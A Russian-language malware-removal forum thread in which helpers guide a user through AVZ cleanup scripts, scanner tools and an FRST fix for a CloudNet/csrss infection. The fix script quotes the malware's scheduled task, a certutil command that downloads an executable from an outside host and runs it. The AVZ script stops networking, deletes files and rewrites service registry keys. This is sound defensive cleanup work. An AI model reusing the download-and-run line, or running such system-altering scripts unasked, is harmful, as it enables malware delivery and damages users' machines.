Здравствуйте
компьютер заражен вирусами, сканирование разными антивирусными сканерами не помогает
прошу вас помочь
Здравствуйте
компьютер заражен вирусами, сканирование разными антивирусными сканерами не помогает
прошу вас помочь
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) i--l--g--i--z, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте!
Вы собрали логи устаревшей версией (с зеркала). Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по ссылке из правил) и повторите CollectionLog.
Вложение 680242Сообщение от Sandor
отчет во вложении
Через Панель управления - Удаление программ - удалите нежелательное ПО:
CloudNet
Временно отключите защитное ПО.
Выполните скрипт в AVZ:
Компьютер перезагрузится.Код:{Исправление в службах в реестре, значения ImagePath. Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями Virusnet.info При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. } var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String; DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String; ImagePathStr, RootStr, SubRootStr, LangID: string; AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer; FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String; procedure CheckAndRestoreSection(Root: String); begin Inc(AllRoots); if RegKeyExistsEx('HKLM', Root) then RegKeyResetSecurity('HKLM', Root) else begin Inc(RootsRestored); RegKeyCreate('HKLM', Root); AddToLog(RegSectMsg + Root + RestMsg); end; end; procedure CheckAndRestoreSubSection; begin CheckAndRestoreSection(SubRootStr); end; procedure RestoredMsg(Root, Param: String); begin AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg); Inc(KeysRestored); end; procedure FixedMsg(Root, Param: String); begin AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg); Inc(KeysFixed); end; procedure RestoreStrParam(Root, Param, Value: String); begin RegKeyStrParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; procedure CheckAndRestoreStrParam(Root, Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then RestoreStrParam(Root, Param, Value); end; procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then begin RegKeyIntParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; end; procedure CheckAndRestoreMultiSZParam(Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, Param) then begin ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true); RestoredMsg(RootStr, Param); end; end; // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS' procedure ImagePathFix(Node, Srv: String); var RegStr: String; begin RegStr := 'SYSTEM\' + Node + '\Services\' + Srv; if RegKeyExistsEx('HKLM', RegStr) then begin Inc(AllKeys); RegKeyResetSecurity('HKLM', RegStr); RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr); FixedMsg(RegStr, 'ImagePath'); end; end; { Выполнение исправление всех ключей в ветках - 'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'} procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String); var FileServiceDll, CCSNumber: string; i : integer; begin if Srv = 'BITS' then FileServiceDll := FullPathSystem32 + 'qmgr.dll' else FileServiceDll := FullPathSystem32 + 'wuauserv.dll'; RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv; CheckAndRestoreSection(RootStr); CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText); CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText); CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem'); Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then RestoreStrParam(RootStr, 'ImagePath', ImagePathStr) else begin Dec(AllKeys); if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then for i:= 0 to 999 do begin if i > 0 then CCSNumber := FormatFloat('ControlSet000', i) else CCSNumber := 'CurrentControlSet'; ImagePathFix(CCSNumber, Srv); end; end; CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1); CheckAndRestoreIntParam(RootStr, 'Start', 2); CheckAndRestoreIntParam(RootStr, 'Type', 32); if Srv = 'BITS' then begin CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs'); CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ'); end; SubRootStr:= RootStr + '\Enum'; CheckAndRestoreSubSection; CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000'); CheckAndRestoreIntParam(SubRootStr, 'Count', 1); CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1); SubRootStr := RootStr + '\Security'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then begin RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00'); RestoredMsg(SubRootStr, 'Security'); end; SubRootStr:= RootStr + '\Parameters'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); RestoredMsg(SubRootStr, 'ServiceDll'); end else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); FixedMsg(SubRootStr, 'ServiceDll'); end end; { Главное выполнение } begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); TerminateProcessByName('c:\windows\rss\csrss.exe'); TerminateProcessByName('c:\windows\windefender.exe'); StopService('4F959A7FC8138071'); StopService('WinDefender'); StopService('Winmon'); StopService('WinmonFS'); StopService('WinmonProcessMonitor'); QuarantineFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', ''); QuarantineFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', ''); QuarantineFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', ''); QuarantineFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', ''); QuarantineFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', ''); QuarantineFile('c:\windows\rss\csrss.exe', ''); QuarantineFile('C:\Windows\System32\drivers\Winmon.sys', ''); QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys', ''); QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', ''); QuarantineFile('C:\Windows\TEMP\4DDAE01.sys', ''); QuarantineFile('c:\windows\windefender.exe', ''); DeleteFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32'); DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', ''); DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\scheduled.exe', ''); DeleteFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', '32'); DeleteFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', ''); DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32'); DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', '32'); DeleteFile('c:\windows\rss\csrss.exe', ''); DeleteFile('C:\Windows\rss\csrss.exe', '32'); DeleteFile('C:\Windows\System32\drivers\Winmon.sys', '32'); DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys', '32'); DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '32'); DeleteFile('C:\Windows\TEMP\4DDAE01.sys', '32'); DeleteFile('c:\windows\windefender.exe', '32'); DeleteService('WinDefender'); DeleteService('Winmon'); DeleteService('WinmonFS'); DeleteService('WinmonProcessMonitor'); ClearLog; ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg'); ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg'); LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); if LangID = '0419' then begin DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.'; DispayNameTextWuauServ := 'Автоматическое обновление'; DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.'; DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)'; AddToLog('Операционная система - русская'); FinishMsg := '–––– Восстановление завершено ––––'; RestoreMsg := 'Восстановлено разделов\параметров: '; FixMsg := 'Исправлено параметров: '; CheckMsg := 'Проверено разделов\параметров: '; RegSectMsg := 'Раздел реестра HKLM\'; ParamMsg := 'Параметр '; ParamValueMsg := 'Значение параметра '; InRegSectMsg := ' в разделе реестра HKLM\'; CorrectMsg := ' исправлено на оригинальное.'; RestMsg := ' восстановлен.'; end else if LangID = '0409' then begin DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.'; DispayNameTextWuauServ := 'Automatic Updates'; DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.'; DispayNameTextBITS := 'Background Intelligent Transfer Service'; AddToLog('Operation system - english'); FinishMsg := '–––– Restoration finished ––––'; RestoreMsg := 'Sections\parameters restored: '; FixMsg := 'Parameters corrected: '; CheckMsg := 'Sections\parameters checked: '; RegSectMsg := 'Registry section HKLM\'; ParamMsg := 'Parameter '; ParamValueMsg := 'Value of parameter '; InRegSectMsg := ' in registry section HKLM\'; CorrectMsg := ' corrected on original.'; RestMsg := ' restored.'; end; AddToLog(''); { Определение папки X:\Windows\System32\ } NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory'); ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs'; Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1); FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\'; AllRoots := 0; AllKeys := 0; RootsRestored := 0; KeysRestored := 0; KeysFixed := 0; CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS'); CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv'); AddToLog(''); AddToLog(FinishMsg); AddToLog(''); AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored)); AddToLog(FixMsg + IntToStr(KeysFixed)); AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys)); SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log'); DeleteSchedulerTask('csrss'); DeleteSchedulerTask('ScheduledUpdate'); RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32'); RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32'); RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^LtHgNeMqRB.url', '32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','QuietDew', '32'); DeleteService('4F959A7FC8138071'); BC_ImportALL; ExecuteSysClean; BC_Activate; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
После перезагрузки, выполните такой скрипт:
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему сообщению.
Сделайте повторные логи по правилам. (CollectionLog)
выполнил все инструкции
файлы во вложении
Пролечите систему с помощью KVRT, папку C:\KVRT\reports упакуйте в архив и прикрепите к следующему сообщению.
После этого соберите свежий CollectionLog.
Файлы выше
Уже лучше, но еще не все.
- Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
- Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
- Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
- Прикрепите отчет к своему следующему сообщению.
выполнил сканирование AdwCleaner
- - - - -Добавлено - - - - -
Здравствуйте, все эти действия не помогли
дистрибутив антивирусной защиты не устанавливается.
обновление windows не включается
Мы ещё не закончили.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Прикрепил отчеты к сообщению
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000\...\MountPoints2: {1f717c32-b8d8-11e5-9749-002522d5b574} - G:\LGAutoRun.exe GroupPolicy: Restriction ? <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION Task: {1D75C3E5-CC23-46BB-8238-2D6C642696B0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {B0AD56F5-1883-42A2-97D4-62BCB5D05EC6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4016640 2019-12-20] () [File not signed] <==== ATTENTION Toolbar: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} - No File R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder) 2019-12-20 09:21 - 2019-12-20 09:21 - 000000000 ____D C:\Users\Baza\AppData\Roaming\EpicNet Inc 2019-12-20 09:20 - 2019-12-20 12:01 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate 2019-12-20 09:20 - 2019-12-20 12:01 - 000003172 _____ C:\Windows\system32\Tasks\csrss FirewallRules: [{217BD779-6FAC-4712-A07B-026FE1DFDDB8}] => (Allow) C:\Users\Baza\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File FirewallRules: [{BE8CB9D6-9B44-4FC6-9A06-EB69D80F0A7A}] => (Allow) C:\Program Files\DriverPack Cloud\cloud.exe No File FirewallRules: [{0713AA24-E86E-4D88-BAA8-C5E311B5AFE5}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{7DA884E6-275B-4A63-88F8-6A91C4B37605}] => (Allow) C:\Users\Baza\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File EmptyTemp: Reboot: End::- Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
лог прикрепил
Что вы под этим подразумеваете?
Какой-то антивирус пытаетесь установить и не получается?
да не получается установить антивирус eset avremover_ees_nt32_rus, доходит но копирования файлов и прерывается
хочу установить обновления windows не устанавливается
- - - - -Добавлено - - - - -
да не устанавливается eset avremover_ees_nt32_rus
не устанавливается обновление windows
в списке службы нет службы обновление
это наблюдается на всех зараженных компьютерах
Что именно вы пытаетесь установить? Антивирус Eset? Или запустить утилиту очистки антивирусов?
В этой системе установлен антивирус Dr.Web Security Space и другие антивирусы устанавливать не нужно. Достаточно одного.
По службе обновлений - это в другой раздел, т.к. здесь производится именно лечение от вредоносных программ.
у меня корпоративная лицензия на Антивирус Eset, пытаюсь установить eset, Dr.Web Security Space в дальнейшем будет удален
- - - - -Добавлено - - - - -
кстати CloudNet снова себя установил, самостоятельно
Соберите свежий CollectionLog Автологером.
+
- Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
- Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
- Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
- Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
- Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
- Прикрепите этот файл к своему следующему сообщению.
файлы во вложении
Уважаемый(ая) i--l--g--i--z, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
